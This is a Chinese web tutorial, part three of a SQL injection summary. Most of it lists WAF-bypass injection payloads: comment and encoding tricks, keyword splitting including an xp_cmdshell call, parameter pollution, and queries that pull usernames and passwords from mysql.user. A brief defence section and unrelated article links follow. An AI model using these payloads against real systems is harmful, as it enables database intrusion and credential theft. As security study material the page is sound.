这可能是最全的SQL注入总结，很有用( 三 ) _SQL注入

文章插图

MySQL查询数据库版本；

文章插图

文章插图

常用过WAF技巧1.特征字符大小写（基本没用）
UnIoN SeLcT 1,2,32.内联注释
id=-1/*!UNION*/%20//*!SELECT*/%201,2,33.特殊字符代替空格
%09 tab键(水平)、%0a 换行、%0c 新的一页%0d return功能、%0b tab键(垂直)、%a0空格
4.等价函数和逻辑符号
hex()、bin()==>ascii()sleep()==>benchmark()concat_ws()==>group_concat()mid()、substr()==>substring()@@version==>version()@@datadir==>datadir()逻辑符号：如and和or不能使用时，尝试&&和||双管道符。5.特殊符号
反引号，select `version()`，绕过空格和正则加号和点，"+"和"."代表连接，也可绕过空格和关键字过滤@符号，用于定义变量，一个@代表用户变量，@@代表系统变量
6.关键字拆分
'se'+'lec'+'t'%S%E%L%C%T 1,2,3?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell"net user"')!和()：'or--+2=--!!!'2id=1+(UnI)(oN)+(SeL)(EcT)7.加括号绕过
小括号
union (select+1,2,3+from+users)%23union(select(1),(2),(3)from(users))id=(1)or(0x50=0x50)id=(-1)union(((((((select(1),hex(2),hex(3)from(users))))))))花括号
select{x user}from{x mysql.user}id=-1 union select 1,{x 2},38.过滤and和or下的盲注
id=strcmp(left((select%20username%20from%20users%20limit%200,1),1),0x42)%23id=strcmp(left((select+username+from+limit+0,1),1,0x42)%239.白名单绕过
拦截信息：
GET /pen/news.php?id=1 union select user,password from mysql.user绕过：
GET /pen/news. php/admin?id=1 union select user,password from mysql. userGET /pen/admin/..news. php?id=1 union select user,password from mysql. user10.HTTP参数控制
（1）HPP（HTTP Parmeter Polution）（重复参数污染）
举例：
index.php?id=1 union select username,password from usersindex.php?id=1/**/union/*&id=*/select/*&id=*/username.password/*&id=*/from/*&id=*/usersHPP又称作重复参数污染，最简单的是?uid=1&uid=2&uid=3，对于这种情况，不用的web服务器处理方式不同。
具体WAF如何处理，要看设置的规则，不过示例中最后一个有较大可能绕过
（2）HPF（HTTP Parmeter Fragment）（HTTP分割注入）
HTTP分割注入，同CRLF有相似之处（使用控制字符%0a、%0d等执行换行）
举例：
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users— SQL注入防御1.对用户输入的内容进行转义；
2.限制关键字的输入，如单引号、双引号、右括号等，限制输入的长度；
3.使用SQL语句预处理，对SQL语句进行预编译，然后进行参数绑定，最后传入参数；
4.添加WAF，防火墙等。

这可能是最全的SQL注入总结，很有用( 三 )

推荐阅读

不同主题flashcards

翡翠|翡翠交易时的“行业黑话”你懂多少？

艾滋病病毒|要爱，不要艾！关于艾滋病的这些知识你需要了解

穿搭|越矛盾越时髦，现在就是穿短袖针织的最好季节呀

吃鱼后不能吃什么水果

健康|有脂肪肝怎么办？提醒：这3条妙计，把肝脏的脂肪“减”下去

黄磊|限薪令下的阳奉阴违，黄磊天价片酬曝光，四部戏狂赚1.5亿！

新车｜这辆“M”不太凶！宝马i4 M谍照曝光，明年正式亮相

新华网|各部门助力“双11”电商黄金周货品“快速达”

[肖战]肖战发布全新单曲《光点》：不要捧杀我，我只想做自己

辉说体育|这些球员终于在今天实现了NBA夺冠梦想，等待多年

南阳情感帮|见前男友最后一面，只为了断往事，能不能信，准新娘结婚前3天

喵家影视|快来做一个吧，变废为宝好简单！分享几十款旧衣服制作的包包

张学友经典歌曲分享

电影|今年是恐怖电影的大年，部部爆红，你看过哪几部？

门锁|百万爆款门锁升级版来了！小米智能门锁1S上架：999元

『技术』“云上”生产 “网上”销售 “线上”生活——数字技术激发乡村经济新潜能

梅西|重磅！外媒确认梅西已告知巴萨将离队，网友道别：再见一代天王

胡须发白发红，头发也变白了，是缺少哪些微量元素吃善存是不是有效果

文化历史太有趣：伊拉克战争却选择了放弃抵抗，萨达姆最信任的两支嫡系部队